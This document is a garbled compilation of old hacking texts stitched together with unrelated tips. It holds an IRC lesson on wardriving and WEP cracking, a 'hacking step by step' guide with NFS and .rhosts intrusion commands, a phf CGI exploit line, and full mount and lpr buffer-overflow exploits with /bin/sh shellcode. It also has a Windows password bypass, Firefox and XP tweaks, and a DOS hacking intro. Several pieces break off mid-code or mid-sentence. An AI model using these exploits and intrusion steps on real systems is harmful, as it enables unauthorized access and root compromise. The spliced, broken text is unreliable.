22:21:54 ok once you have compiled all that stuff your almost ready to get started

22:22:23 Could you just explain what it is that those modifications do?

22:22:40 Or is it too lenghty to explain now.

22:22:50 oh yea the linux-wlan stuff only works with the prism2 chipset, which are cards like linksys, dlink, netgear, zoom alot of consumer cards

22:23:09 what motifications

22:23:23 The recompilations

22:23:36 they are pretty much drivers for the cards

22:23:47 i prefer the zoom wireless cards

22:23:53 Ah, ty

22:24:17 ok does everyone in here know what snmp is

22:24:59 any aussies here>?

22:25:02 SNMP

22:25:03 * Paranoiac does not....is a know-nothing-newb

22:25:39 well the linux-wlan binaries are alot like using snmp

22:25:56 like to specify the ssid

22:26:33 a ssid is kinda like a network id

22:26:46 say one access point is on ssid: ap01

22:27:00 and one access point is on ssid: ap02

22:27:19 --- BaGeL[CS] is now known as BaGeL

22:27:28 and you want to attach to ap01 then you would use the ssid of ap01

22:27:45 it is two specify wireless networks

22:27:48 everyone with me?

22:27:53 and questions?

22:28:12 SNMP - Simple Network Managment Protocol

22:28:21 ep

22:28:22 yep

22:28:37 Ah

22:29:00 http://www.rad.com/networks/1995/snmp/snmp.htm

22:29:12 Ty

22:30:09 ok but if you are not familer with snmp and using mibs, you could use a program my friend wrote called wlanfe you can get it from se.rious.net or freshmeat.net

22:30:51 --> r (trashmail@172.166.185.154) has joined #bsrf

22:31:00 ok now you are ready to go wardriving

22:31:10 --> Sheik (sheik001@65.58.40.148) has joined #bsrf

22:31:34 i am warning, make sure you are with someone else and make them drive

22:31:49 Hehe

22:31:58 it is really hard to drive and look at your computer at the same time trust me

22:32:18 wtf?

22:32:21 drive?

22:32:26 and computer

22:32:32 heh

22:33:06 yes

22:33:25 also you should get some programs before you go

22:33:48 so you basically can just use someone elses wireless network?

22:34:02 these programs are kismet, airsnort, scanchan, arpping

22:34:06 yes miteymous

22:34:10 like...hijack it...an invisible parasite?

22:34:13 ok question

22:34:19 yes

22:34:51 <-- Sheik has quit (Quit: )

22:34:53 would it be possible to set up your own wireless network, that hijacks your targets, and then spreads it farther via your equipment

22:35:06 maybe letting you have free access at your house

22:35:14 yes you could bridge the connection

22:35:21 with a wireless bridge

22:35:41 he networks would need to overlap, though

22:35:45 *The

22:35:52 would the same basic techniques work with cell phone modems

22:36:34 well if you have the wireless bridge on the same ssid then your ok

22:36:40 and they wont overlap

22:36:53 miteymous: i dont know anything about cell phone modems

22:37:16 well i mean they obviously work on different frequencies

22:37:16 it might work but i dont know what cell phones use as there protocals

22:37:39 well then you could use a frequency counter and use a ham radio

22:37:44 <-- Forbze has quit (Ping timeout)

22:37:51 hey is neve campbelle that girl in the movie three to tango?

22:38:44 everyone ready to continue

22:38:58 <-- r (trashmail@172.166.185.154) has left #bsrf

22:39:06 go ahead :)

22:39:29 yah

22:39:31 :D

22:39:55 --> Forbze (thedon@203.134.22.186) has joined #bsrf

22:39:56 --- ChanServ gives channel operator status to Forbze

22:40:08 ok well when you are ready to go you need to put your wireless card in promiscuos mode which means it will gather everything that is in the air

22:40:35 there are tools that come with kismet

22:40:36 <-- LiquidKn0wledge (LiquidKn0w@66.153.12.78) has left #bsrf

22:40:56 ok after that is all set you will start up kismet

22:41:15 and go drive around

22:41:51 once something pops up on the screen there will be three sections

22:42:02 nite all

22:42:04 ssid: it will say the ssid here

22:42:14 nite

22:42:20 WEP: it will say if wep is being used

22:42:32 channel it will say what channel the network is on

22:42:48 does everyone know what WEP is

22:43:00 no

22:43:05 ditto

22:43:19 wireless encryption protocal

22:43:56 it encrypts the network

22:44:17 so you cant attach to the network unless you have the wep key

22:44:36 What kind of encryption is it?

22:45:27 RC4

22:45:43 <-- ro0t has quit (Quit: rm -rf /;reboot&)

22:45:57 so you have to crack the encryption then, does kismet do that?

22:46:04 no

22:46:08 --> ro0t (ro0t@216.153.217.132) has joined #bsrf

22:46:30 ok we will get to what you do if they use wep

22:46:44 but first we will talk about a network with out wep

22:47:19 while you are watching a kismet it will say what the ssid is remember that

22:47:40 if it says under W: N, then they arent using wep

22:48:03 ok so once you have got these

22:48:32 you will need pop out your card to take it out of promiscues mode

22:48:40 and pop it back in

22:48:48 then you will open wlanfe

22:49:11 and under ssid type the ssid you got from kismet

22:49:16 and click apply

22:49:25 now you are attached

22:49:43 now you need to get a ip

22:50:00 if the access point is using dhcp you can get it that way

22:50:14 but if it isnt you need to find out what ips they are using

22:50:24 to do this we will use arping

22:51:08 run that and we will get some ips they are using

22:51:23 so you will assign a unused ip using ifconfig

22:51:43 and then it is just like you are on a normal network

22:51:46 any questions?

22:52:12 so at this point you are connected and have internet access?

22:52:21 huh? is this thing still going??

22:52:24 and access to their network?

22:52:25 j/k

22:52:29 Hehe

22:52:34 yes

22:52:39 what Strider are you bored

22:52:50 whoah

22:53:03 Are there many networks that are unsecured?

22:53:09 yes

22:53:12 lots

22:53:18 Groovy

22:53:28 the city hall in my town is not using wep

22:53:40 Strider: what can we do to keep you interested

22:53:53 me?

22:53:55 ermm

22:53:57 danece?

22:54:01 dance*

22:54:10 How can you secure yourself from being detected/accessed?

22:54:12 ok so lets say you are connected now

22:54:24 would you be able to see all the computers that are shared on the network?

22:54:32 yes

22:54:36 network neighborhood type thing?

22:54:37 if you use samba

22:54:43 sorry Strider

22:54:53 Paranoiac: i will get to securing them later

22:54:57 * miteymous does the chicken dance for Strider

22:55:05 lmao

22:55:07 Ahh, ok...thanks

22:55:16 Bah....that's nothing

22:55:20 wait i thought samba was used to show graphics

22:55:25 * Paranoiac does the Funky Monkey

22:55:35 when compiling programs etc

22:55:48 nope

22:55:54 what Strider

22:56:10 ahhsoo o_O

22:56:40 ok everyone ready

22:56:46 to talk about wep

22:57:01 yup

22:57:07 Aye, cap'n

22:57:17 go on then

22:57:24 ok

22:57:41 well out in california two kids figured out how to break wep

22:58:31 hold on, whats wep?? is that still the wireless thingy?

22:58:41 yes

22:58:46 ah ok

22:58:49 carry on

22:58:51 wireless encryption protocol :x

22:58:52 it is wireless encryption protocal

22:59:32 ok when you find a wireless network you need to use airsnort

23:00:11 with your card still in promiscuos mode you need to start airsnort and just start to gather packets

23:00:19 --> GOD (que_import@226C75B7.CF2E741F.41F302F6.IP) has joined #bsrf

23:00:47 usually with a 128 bit wep key you should gather 1 gig of traffic

23:00:58 then it will list the wep key

23:01:06 everyone with me so far

23:01:25 So it grabs the key from the other user's packets?

23:01:37 airsnort figures out the key for you?

23:01:44 yes and beacon frames

23:01:48 yes miteymous

23:02:02 That's useful

23:02:20 yes

23:02:33 ok so once you have the wep key

23:02:52 Is the WEP verification a constant activity then? As opposed to using it once, like a password....

23:02:59 --> nosolution (NS@p19-tnt1.ham.ihug.co.nz) has joined #bsrf

23:03:36 you will load up wlanfe and put the ssid you have and click on the wep key tab and type the key

23:03:45 yes it is constant Paranoiac

23:04:55 --> Jackel88 (new-web@166.90.65.247) has joined #bsrf

23:05:10 ok so once you attach to the network you need to get your ip the same way you did before

23:05:19 without wep

23:06:28 <-- Jackel88 has quit (Quit: Leaving)

23:06:29 ok there are three ways to secure a wireless network besides wep

23:06:31 --- GOD is now known as satan

23:06:34 kewl

23:06:37 cause wep sucks

23:06:43 <-- bluehaze[BED] has quit (Ping timeout)

23:06:44 Hehe

23:06:59 hey this is already registered

23:07:46 ok the three ways are a radius server, a kerbores server, ipsec

23:07:56 --- satan is now known as compaq

23:08:36 if you need to know about those ways read the rfc's cause i am not going to explain them this time maybe another lecture

23:09:07 suhweet

23:09:11 ok im done any questions

23:09:19 or opinions

23:09:25 do you have to have a big antennae?

23:09:30 no

23:09:33 and how far away can you be

23:09:35 --> Ravish (Ravish@210.214.102.213) has joined #bsrf

23:09:48 500 feet is 2 megs a second

23:09:57 * Strider is away (finger lickin the chicken)

23:10:03 hmm

23:10:04 <-- Forbze has quit (Quit: Vive La Revolution)

23:10:06 thats not that far

23:10:07 What kind of wireless is this?

23:10:08 i would not go past 500 feet

User's guide

__________________________

Well, howdi folks... I guess you are all wondering who's this guy (me)

that's trying to show you a bit of everything... ?

Well, I ain't telling you anything of that...

Copyright, and other stuff like this (below).

Copyright and stuff...

______________________

If you feel offended by this subject (hacking) or you think that you could

do better, don't read the below information...

This file is for educational purposes ONLY...;)

I ain't responsible for any damages you made after reading this...(I'm very

serious...)

So this can be copied, but not modified (send me the changes, and if they

are good, I'll include them ).

Don't read it, 'cuz it might be illegal.

I warned you...

If you would like to continue, press .

Intro: Hacking step by step.

_________________________________________________________________________________

Well, this ain't exactely for begginers, but it'll have to do.

What all hackers has to know is that there are 4 steps in hacking...

Step 1: Getting access to site.

Step 2: Hacking r00t.

Step 3: Covering your traces.

Step 4: Keeping that account.

Ok. In the next pages we'll see exactely what I ment.

Step 1: Getting access.

_______

Well folks, there are several methods to get access to a site.

I'll try to explain the most used ones.

The first thing I do is see if the system has an export list:

mysite:~>/usr/sbin/showmount -e victim.site.com

RPC: Program not registered.

If it gives a message like this one, then it's time to search another way

in.

What I was trying to do was to exploit an old security problem by most

SUN OS's that could allow an remote attacker to add a .rhosts to a users

home directory... (That was possible if the site had mounted their home

directory.

Let's see what happens...

mysite:~>/usr/sbin/showmount -e victim1.site.com

/usr victim2.site.com

/home (everyone)

/cdrom (everyone)

mysite:~>mkdir /tmp/mount

mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/

mysite:~>ls -sal /tmp/mount

total 9

1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./

1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../

1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/

1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/

1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/

1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/

1 -rw------- 1 root root 242 Mar 9 1997 sudoers

1 drwx------ 3 test 100 1024 Oct 8 21:05 test/

1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/

Well, we wanna hack into rapper's home.

mysite:~>id

uid=0 euid=0

mysite:~>whoami

root

mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd

We use /bin/csh 'cuz bash leaves a (Damn!) .bash_history and you might

forget it on the remote server...

mysite:~>su - rapper

Welcome to rapper's user.

mysite:~>ls -lsa /tmp/mount/

total 9

1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./

1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../

1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/

1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/

1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/

1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/

1 -rw------- 1 root root 242 Mar 9 1997 sudoers

1 drwx------ 3 test 100 1024 Oct 8 21:05 test/

1 drwx------ 15 rapper daemon 1024 Oct 20 18:57 rapper/

So we own this guy's home directory...

mysite:~>echo "+ +" > rapper/.rhosts

mysite:~>cd /

mysite:~>rlogin victim1.site.com

Welcome to Victim.Site.Com.

SunOs ver....(crap).

victim1:~$

This is the first method...

Another method could be to see if the site has an open 80 port. That would

mean that the site has a web page.

(And that's very bad, 'cuz it usually it's vulnerable).

Below I include the source of a scanner that helped me when NMAP wasn't written.

(Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor).

NMAP is a scanner that does even stealth scanning, so lots of systems won't

record it.

/* -*-C-*- tcpprobe.c */

/* tcpprobe - report on which tcp ports accept connections */

/* IO ERROR, error@axs.net, Sep 15, 1995 */

#include

#include

#include

#include

#include

#include

int main(int argc, char **argv)

{

int probeport = 0;

struct hostent *host;

int err, i, net;

struct sockaddr_in sa;

if (argc != 2) {

printf("Usage: %s hostname\n", argv[0]);

exit(1);

}

for (i = 1; i <>

strncpy((char *)&sa, "", sizeof sa);

sa.sin_family = AF_INET;

if (isdigit(*argv[1]))

sa.sin_addr.s_addr = inet_addr(argv[1]);

else if ((host = gethostbyname(argv[1])) != 0)

strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr);

else {

herror(argv[1]);

exit(2);

}

sa.sin_port = htons(i);

net = socket(AF_INET, SOCK_STREAM, 0);

if (net <>

perror("\nsocket");

exit(2);

}

err = connect(net, (struct sockaddr *) &sa, sizeof sa);

if (err <>

printf("%s %-5d %s\r", argv[1], i, strerror(errno));

fflush(stdout);

} else {

printf("%s %-5d accepted. \n", argv[1], i);

if (shutdown(net, 2) <>

perror("\nshutdown");

exit(2);

}

}

close(net);

}

printf(" \r");

fflush(stdout);

return (0);

}

Well, now be very carefull with the below exploits, because they usually get

logged.

Besides, if you really wanna get a source file from /cgi-bin/ use this

sintax : lynx http://www.victim1.com//cgi-bin/finger

If you don't wanna do that, then do a :

mysite:~>echo "+ +" > /tmp/rhosts

mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+

/root/.rhosts" | nc -v - 20 victim1.site.com 80

then

mysite:~>rlogin -l root victim1.site.com

Welcome to Victim1.Site.Com.

victim1:~#

Or, maybe, just try to find out usernames and passwords...

The usual users are "test", "guest", and maybe the owner of the site...

I usually don't do such things, but you can...

Or if the site is really old, use that (quote site exec) old bug for

wu.ftpd.

There are a lot of other exploits, like the remote exploits (innd, imap2,

pop3, etc...) that you can find at rootshell.connectnet.com or at

dhp.com/~fyodor.

Enough about this topic. (besides, if you can finger the site, you can

figgure out usernames and maybe by guessing passwords (sigh!) you could get

access to the site).

Step 2: Hacking r00t.

______

First you have to find the system it's running...

a). LINUX

ALL versions:

A big bug for all linux versions is mount/umount and (maybe) lpr.

/* Mount Exploit for Linux, Jul 30 1996

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::

:::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::

::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::

::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::

::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::

::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::

::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::

::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::

:::::::...........:::...........:::...........::.......:......:.......::::::

:::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::

Discovered and Coded by Bloodmask & Vio

Covin Security 1996

*/

#include

#include

#include

#include

#include

#define PATH_MOUNT "/bin/mount"

#define BUFFER_SIZE 1024

#define DEFAULT_OFFSET 50

u_long get_esp()

{

__asm__("movl %esp, %eax");

}

main(int argc, char **argv)

{

u_char execshell[] =

"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"

"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"

"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

char *buff = NULL;

unsigned long *addr_ptr = NULL;

char *ptr = NULL;

int i;

int ofs = DEFAULT_OFFSET;

buff = malloc(4096);

if(!buff)

{

printf("can't allocate memory\n");

exit(0);

}

ptr = buff;

/* fill start of buffer with nops */

memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));

ptr += BUFFER_SIZE-strlen(execshell);

/* stick asm code into the buffer */

for(i=0;i <>

*(ptr++) = execshell[i];

addr_ptr = (long *)ptr;

for(i=0;i < (8/4);i++)

*(addr_ptr++) = get_esp() + ofs;

ptr = (char *)addr_ptr;

*ptr = 0;

(void)alarm((u_int)0);

printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");

execl(PATH_MOUNT, "mount", buff, NULL);

}

/*LPR exploit:I don't know the author...*/

#include

#include

#include

#define DEFAULT_OFFSET 50

#define BUFFER_SIZE 1023

long get_esp(void)

{

__asm__("movl %esp,%eax\n");

}

void main()

{

char *buff = NULL;

unsigned long *addr_ptr = NULL;

char *ptr = NULL;

u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"

"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"

"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"

"\xd7\xff\xff\xff/bin/sh";

int i;

buff = malloc(4096);

if(!buff)

{

printf("can't allocate memory\n");

exit(0);

}

ptr = buff;

memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));

ptr += BUFFER_SIZE-strlen(execshell);

for(i=0;i <>

*(ptr++) = execshell[i];

addr_ptr = (long *)ptr;

for(i=0;i<2;i++)>

*(addr_ptr++) = get_esp() + DEFAULT_OFFSET;

ptr = (char *)addr_ptr;

*ptr = 0;

execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);

}

b.) Version's 1.2.* to 1.3.2

NLSPATH env. variable exploit:

/* It's really annoying for users and good for me...

AT exploit gives only uid=0 and euid=your_usual_euid.

*/

#include

#include

#include

#include

#include

#define path "/usr/bin/at"

#define BUFFER_SIZE 1024

#d

By SUMIT SINGHAL

Have you ever forgottin your windowz password and never been able to retrieve those files you longed?

Well heres how to change your password without knowing the old one.

1)when the computer boots keep pressing F8 until you get to a boot screen.

2)Select boot in DOS.

3)Get yourself into the windows folder by typing "cd windows" (without the "")

4)next type "dir *.pwl". This will display the login password files.

5)after you found out the one thats yours (or ne1 elses you want to get into) type del username.pwl

6)Reboot the computer

7)When you have to login, put in the username you deleted, and enter ne password you like.

8)The computer will say sumthin like "No password. Would you like to use this one? Confirm?

9)Put your password in, and voila!

10) sit back and watch all the noobs try and open their windowz boxes with the wrong password!!!lol

Discover more than 20 behind-the-scenes tweaks for speeding up page loads, reducing memory drain and making the interface behave the way you want it to


Ever since its debut, Firefox has garnered a reputation for being an enormously customizable program, both through its add-on architecture and its internal settings. In fact, many of Firefox's settings aren't exposed through the Tools > Options menu; the only way to change them is to edit them manually. In this article, we'll explore some of the most useful Firefox settings that you can change on your own and that aren't normally available through the program's graphical interface. The closest analogy to how Firefox manages its internal settings is the Windows Registry. Each setting, or preference, is given a name and stored as a string (text), integer (number) or Boolean (true/false) value. However, Firefox doesn't keep its settings in the registry, but in a file called prefs.js. You can edit prefs.js directly, but it'soften easier to change the settings through the browser window.

Type about:config in the address bar and press Enter, and you'll see all the settings currently enumerated in prefs.js, listed in alphabetical order. To narrow down the hundreds of configuration preferences to just the few you need, type a search term into the Filter: bar. (Click the Show All button or just clear the Filter: bar to get the full list back again.)

The about:config page. (Click for larger view.)

To edit a preference, double-click on the name and you'll be prompted for the new value. If you double-click on an entry that has a Boolean value, it'll just switch from true to false or vice versa; double-click again to revert to the original setting. Not all changes take effect immediately, so if you want to be absolutely certain a given change is in effect, be sure to close and reopen Firefox after making a change.

Editing a preference. (Click for larger view.)

Note that not every setting in about:config exists by default. Some of them have to be created manually. If you want to add a new preference, right-click somewhere on the page and select New, then select the type of item to create (String, Integer or Boolean) and supply the name and value.

Before you begin

Here are a few caveats to keep in mind as you explore and tweak:

Not everyone will get the same benefits by enabling these tweaks. This is especially true for changing the network settings. If you habitually visit sites that don't allow a large number of connections per client, for instance, you won't see much benefit from raising the number of connections per server.

Some hacks may have a limited shelf life. With each successive release of Firefox, the need for tweaking any of the performance-related config settings (like the network settings) may dwindle as Firefox becomes more self-tuning based on feedback from real-world usage scenarios. In short, what works now may not always work in the future -- and that might not be a bad thing.

Keep a log of everything you change, or make backups. If you tweak something now and notice bizarre activity in a week, you'll want to be able to track back to what was altered and undo it. Firefox does show which about:config changes have been set manually, but this isn't always the most accurate way to find out what you changed.

To make a backup of your preferences in Firefox, just make a copy of the file prefs.js, which is kept in your Firefox profile folder. If you mess something up, you can always copy this file back in. (Be sure to shut down Firefox before making a copy of prefs.js or moving a copy back into the profile folder!)

In Windows XP, the profile folder is
\Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\.default\

In Windows Vista, this folder is
\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\.default\

Note that Application Data and AppData are hidden folders by default, so they may not show up unless you force Explorer to show hidden objects. (Open the Control Panel, double-click Folder Options, select the View tab, select "Show hidden files and folders" and click OK.)

In Mac OS X, the profile folder is
/Library/Application Support/Firefox/Profiles/.default/

and in Linux it's
~/.mozilla/firefox/.default/

but on those platforms it's usually quicker simply to search for prefs.js.

Alternatively, you can use the handy Firefox Extension Backup Extension (FEBE). It backs up not only the prefs.js file but just about every other thing in Firefox -- extensions, themes, cookies, form history and so on.

Reqirements - Any Phone with bluetooth (software installation facility avilable)
G.P.RS must b enabled

go to this link

www.cellity.com

searched By - SUMIT SINGHAL

Secret Codes

Monitor mode: Hold C and press 379
Secret menu: Hold C and press 987
Version number: Hold C and press 597
Phase1 and 2 : Hold C and press 499
Warm start : Hold C and press 179
Instant turn off: Hold C and press 999
Unlock menu: Hold C and press 787090

20 things you didn't know about Windows XP

You've read the reviews and digested the key feature enhancements and operational changes. Now it's time to delve a bit deeper and uncover some of Windows XP's secrets.

1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).

2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish. (Professional Edition only).

3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.

4. XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options -- they're all far too baroque to go into here.

6. XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry and don't bother.

7. You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.

8. XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files well alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can put things back as they were by typing 'regsvr32 zipfldr.dll'.

9. XP has ClearType -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.

10. You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your chum's real IP address -- they can find this out by going to www.whatismyip.com -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.

11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.

13. You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2', which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.

14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.

15. XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.

16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.

17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.

18. Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.

19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.

20. The next release of Windows XP, codenamed Longhorn, is due out late dis month The next big release is codenamed Blackcomb and will be out in 2010/2011

Reply With Quote

So you have the newest, glitziest, "Fisher Price" version of Windows: XP. How
can you use XP in a way that sets you apart from the boring millions of ordinary
users?

The key to doing amazing things with XP is as simple as D O S. Yes, that's
right, DOS as in MS-DOS, as in MicroSoft Disk Operating System. Windows XP (as
well as NT and 2000) comes with two versions of DOS. Command.com is an old DOS
version. Various versions of command.com come with Windows 95, 98, SE, ME,
Window 3, and DOS only operating systems.

The other DOS, which comes only with XP, 2000 and NT, is cmd.exe. Usually
cmd.exe is better than command.com because it is easier to use, has more
commands, and in some ways resembles the bash shell in Linux and other Unix-type
operating systems. For example, you can repeat a command by using the up arrow
until you back up to the desired command. Unlike bash, however, your DOS command
history is erased whenever you shut down cmd.exe. The reason XP has both
versions of DOS is that sometimes a program that won?t run right in cmd.exe will
work in command.com

note : m not comparing bash to dos


DOS is your number one Windows gateway to the Internet, and the open sesame to
local area networks. From DOS, without needing to download a single hacker
program, you can do amazingly sophisticated explorations and even break into
poorly defended computers.


****************
You can go to jail warning: Breaking into computers is against the law if you do
not have permission to do so from the owner of that computer. For example, if
your friend gives you permission to break into her Hotmail account, that won't
protect you because Microsoft owns Hotmail and they will never give you
permission.
****************
****************
You can get expelled warning: Some kids have been kicked out of school just for
bringing up a DOS prompt on a computer. Be sure to get a teacher's WRITTEN
permission before demonstrating that you can hack on a school computer.
****************

So how do you turn on DOS?
Click All Programs -> Accessories -> Command Prompt
That runs cmd.exe. You should see a black screen with white text on it, saying
something like this:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Your first step is to find out what commands you can run in DOS. If you type
"help" at the DOS prompt, it gives you a long list of commands. However, this
list leaves out all the commands hackers love to use. Here are some of those
left out hacker commands.

TCP/IP commands:
telnet
netstat
nslookup
tracert
ping
ftp

NetBIOS commands (just some examples):
nbtstat
net use
net view
net localgroup

TCP/IP stands for transmission control protocol/Internet protocol. As you can
guess by the name, TCP/IP is the protocol under which the Internet runs. along
with user datagram protocol (UDP). So when you are connected to the Internet,
you can try these commands against other Internet computers. Most local area
networks also use TCP/IP.

NetBIOS (Net Basic Input/Output System) protocol is another way to communicate
between computers. This is often used by Windows computers, and by Unix/Linux
type computers running Samba. You can often use NetBIOS commands over the
Internet (being carried inside of, so to speak, TCP/IP). In many cases, however,
NetBIOS commands will be blocked by firewalls. Also, not many Internet computers
run NetBIOS because it is so easy to break in using them. I will cover NetBIOS
commands in the next article to XP Hacking.

The queen of hacker commands is telnet. To get Windows help for telnet, in the
cmd.exe window give the command:

C:\>telnet /?

Here's what you will get:

telnet [-a][-e escape char][-f log file][-l user][-t term][host
[port]]

-a Attempt automatic logon. Same as --l option except uses the currently logged
on user's name.
-e Escape character to enter telnet cclient prompt.
-f File name for client side logging
-l Specifies the user name to log in with on the remote system. Requires that
the remote system support the TELNET ENVIRON option.
-t Specifies terminal type. Supportedd term types are vt100, vt52, ansi and vtnt
only.
host Specifies the hostname or IP address of the remote computer to connect to.
port Specifies a port number or service name.


****************
Newbie note: what is a port on a computer? A computer port is sort of like a
seaport. It's where things can go in and/or out of a computer. Some ports are
